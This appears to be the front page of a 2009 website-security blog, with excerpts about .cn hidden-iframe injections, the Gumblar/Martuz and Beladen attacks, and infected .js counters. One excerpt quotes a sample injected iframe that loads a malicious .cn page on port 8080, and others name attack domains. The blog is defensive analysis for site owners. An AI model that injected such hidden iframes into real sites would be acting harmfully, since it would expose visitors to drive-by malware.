msgbartop
msgbarbottom

Happy Birthday Unmask Parasites!

01 Jul 09   Filed in Unmask Parasites with 2 Comments

Exactly one year ago I purchased the UnmaskParasites.com domain name and made the first early beta version of my new service available for public testing.

One year later Unmask Parasites is still in beta but now it’s a much more mature service that has proven its viability.

Many interesting things happened during this year.  I’m not a good writer to make it an interesting reading, so I’ll only list some milestones, facts and statistics here.
Continue »»

Security Lesson From a Kenyan Marathon Runner

30 Jun 09   Filed in General with 0 Comments

If you have a site/blog but you are not a techie and don’t know much about website security, you might want to read this article written by a Kenyan marathon runner about how his blog was hacked.

He received an email from Google saying that his site had been temporarily removed from search index because it contained hidden spam links and thus violated Google’s guidelines.
Continue »»

Hidden CN Iframes Are Still Prevalent

25 Jun 09   Filed in Website exploits with 6 Comments

This post is a reminder that .cn iframe attacks are still among leaders.

The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.

Port 8080

Since the pepsi campaign they started using port 8080 in the URLs.

The currently form of the malicious code looks like this

<iframe src="http:// namegamestore .cn:8080/index.php” width=118 height=195 style=”visibility: hidden“></iframe>

It is usually injected at the bottom of index (home) pages.
Continue »»

GStats .cn and GCounter .cn - Malicious Code in .js Files

22 Jun 09   Filed in Tips and Tricks, Website exploits with 0 Comments

This must be not a new attack (I’ve found an almost year old article that mentions gcounter iframes) but I started to notice it this past weekend. First, on the Google’s Webmaster Forums, then in the Unmask Parasites logs. So I guess it’s a new wave of the attack.

GCounter .cn

When I first encountered a site infected by gcounter, I checked it with Unmask Parasites. Nothing suspicious was found except for the fact that the domain name was blacklisted by Google. I checked the diagnostic page and found this clue:

Malicious software is hosted on 1 domain(s), including gcounter.cn/.

Continue »»

Beladen - Elusive Web Server Exploit. (information for site owners and hosting providers)

18 Jun 09   Filed in Website exploits with 15 Comments

There has not been much buzz about the recent Beladen attack. Although some sources estimated 40,000 infected web sites, it was clearly not as prominent as the Gumblar. To my mind, it’s because of the elusive nature of the Beladen exploit. It is very difficult to detect. It works intermittently. Only a small percentage of site visitors are exposed to malicious content. Many security scanners just overlook it.  Most likely the spread of this attack is underestimated.

In this post, I’ll list every fact I know about the Beladen exploit and hope you will add any missing information in the comments. This format proved to be very fruitful in my recent post about the Gumblar exploit where your 150+ comments made my article the most informative online resource about that attack that most other sites (including major media) referred to.

I hope the information you will find here can help site owners and hosting providers understand the nature of the exploit and get rid of it.
Continue »»

Blog Moved to VPS

06 Jun 09   Filed in General with 4 Comments

Hi,

To have more things under my control I moved this blog from a shared hosting plan to a VPS (virtual private server).

However, when I imported WordPress posts to the new location, things didn’t go as expected and the structure of threaded comments got broken. When you read popular posts with active discussions, you might not be able to identify who responding to whom. In new posts, threaded comments should be working. Continue »»

Gumblar/Martuz Aftermath

26 May 09   Filed in Tips and Tricks, Website exploits with 9 Comments

The Gumblar/Martuz epidemic is currently on decline. Comparing with the last week, this week Unmask Parasites registers only a small fraction of Gumblar infected web sites. And I don’t see any new script mutations.

“Martuz .cn” domain no longer resolve and “gumblar .cn” is defunct (the domain is currently parked). This has stopped the surge of new infections. And the increased global awareness helped webmasters identify the problem and get rid of it.

Recovered sites are still blacklisted

Nonetheless, I can still see that many websites recovered from the gumblar/martuz attack are still blacklisted by Google. Their Safe Browsing diagnostic pages say something like:
Continue »»

Security Issues With the Blog

22 May 09   Filed in General, Unmask Parasites with 2 Comments

Yesterday, I had been notified that my blog’s web pages sometimes contain malicious scripts. I had to shut down the blog and investigate the issue. Sorry for the inconvenience. I didn’t want to expose you to any threats.

The Unmask Parasites online service was not affected (it is hosted in a different location, and is very secure). It worked all that time. And during the investigation, my blog redirected visitors to http://www.UnmaskParasites.com
Continue »»

Martuz .cn - New Incarnation of the Gumblar Exploit. So What’s New?

18 May 09   Filed in General, Website exploits with 38 Comments

Gumblar is dead

Many people have noticed that “gumblar .cn” no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain - martuz .cn (95 .129 .145 .58)
Continue »»

A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.

15 May 09   Filed in General with 13 Comments

The Gumblar exploit seems to be the biggest exploit I’ve ever reviewed in my blog. About a thousand visitors come to read my article about Gumblar every day. This exploit accounts for about 80% of positives on Unmask Parasites and I still don’t see any sign of its decline.

I found some more interesting facts about this exploit in SophosLab’s and ScanSafe’s blogs and would like to share them with you.
Continue »»